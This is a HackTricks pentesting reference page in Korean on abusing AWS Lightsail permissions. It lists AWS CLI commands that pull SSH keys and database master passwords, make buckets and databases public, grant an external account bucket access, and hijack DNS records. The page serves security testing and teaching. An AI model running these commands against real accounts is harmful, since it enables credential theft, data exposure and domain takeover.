AWS - Lightsail Privesc

Support HackTricks

Lightsail

Lightsail에 대한 자세한 정보는 다음을 확인하세요:

AWS - Lightsail Enum

Lightsail은 사용자에게 속한 IAM 역할을 사용하지 않고 AWS 관리 계정에 속하므로, 이 서비스를 악용하여 권한 상승을 할 수 없습니다. 그러나 코드, API 키 및 데이터베이스 정보와 같은 민감한 데이터는 이 서비스에서 발견될 수 있습니다.

lightsail:DownloadDefaultKeyPair

이 권한은 인스턴스에 접근하기 위한 SSH 키를 가져올 수 있게 해줍니다:

aws lightsail download-default-key-pair

잠재적 영향: 인스턴스 내에서 민감한 정보를 찾습니다.

lightsail:GetInstanceAccessDetails

이 권한은 인스턴스에 접근하기 위한 SSH 키를 생성할 수 있게 해줍니다:

aws lightsail get-instance-access-details --instance-name <instance_name>

잠재적 영향: 인스턴스 내에서 민감한 정보를 찾습니다.

lightsail:CreateBucketAccessKey

이 권한은 버킷에 접근할 수 있는 키를 얻을 수 있게 해줍니다:

aws lightsail create-bucket-access-key --bucket-name <name>

잠재적 영향: 버킷 내에서 민감한 정보를 찾습니다.

lightsail:GetRelationalDatabaseMasterUserPassword

이 권한은 데이터베이스에 접근하기 위한 자격 증명을 얻을 수 있게 해줍니다:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

잠재적 영향: 데이터베이스 내에서 민감한 정보를 찾습니다.

lightsail:UpdateRelationalDatabase

이 권한은 데이터베이스에 접근하기 위한 비밀번호를 변경할 수 있게 해줍니다:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

데이터베이스가 공개되지 않은 경우, 다음 권한으로 공개할 수 있습니다.

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

잠재적 영향: 데이터베이스 내에서 민감한 정보를 찾습니다.

lightsail:OpenInstancePublicPorts

이 권한은 인터넷에 포트를 열 수 있도록 허용합니다.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

잠재적 영향: 민감한 포트에 접근.

lightsail:PutInstancePublicPorts

이 권한은 인터넷에 포트를 열 수 있게 해줍니다. 이 호출은 지정되지 않은 모든 열린 포트를 닫습니다.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

잠재적 영향: 민감한 포트에 접근.

lightsail:SetResourceAccessForBucket

이 권한은 인스턴스가 추가 자격 증명 없이 버킷에 접근할 수 있도록 허용합니다.

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

잠재적 영향: 민감한 정보가 포함된 버킷에 대한 새로운 접근 가능성.

lightsail:UpdateBucket

이 권한을 통해 공격자는 자신의 AWS 계정에 버킷에 대한 읽기 접근을 부여하거나 심지어 버킷을 모든 사람에게 공개할 수 있습니다:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

잠재적 영향: 민감한 정보가 포함된 버킷에 대한 새로운 접근 가능성.

lightsail:UpdateContainerService

이 권한을 통해 공격자는 컨테이너 서비스에서 개인 ECR에 대한 접근을 부여할 수 있습니다.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

잠재적 영향: 비공개 ECR에서 민감한 정보 얻기

lightsail:CreateDomainEntry

이 권한을 가진 공격자는 서브도메인을 생성하고 자신의 IP 주소로 포인팅할 수 있으며(서브도메인 탈취), 도메인에서 이메일을 스푸핑할 수 있도록 SPF 레코드를 작성하거나, 심지어 메인 도메인을 자신의 IP 주소로 설정할 수 있습니다.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

잠재적 영향: 도메인 탈취

lightsail:UpdateDomainEntry

이 권한을 가진 공격자는 서브도메인을 생성하고 자신의 IP 주소로 포인팅할 수 있으며(서브도메인 탈취), 도메인에서 이메일을 스푸핑할 수 있도록 하는 SPF 레코드를 작성하거나, 심지어 메인 도메인을 자신의 IP 주소로 설정할 수 있습니다.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

잠재적 영향: 도메인 탈취

HackTricks 지원하기

Last updated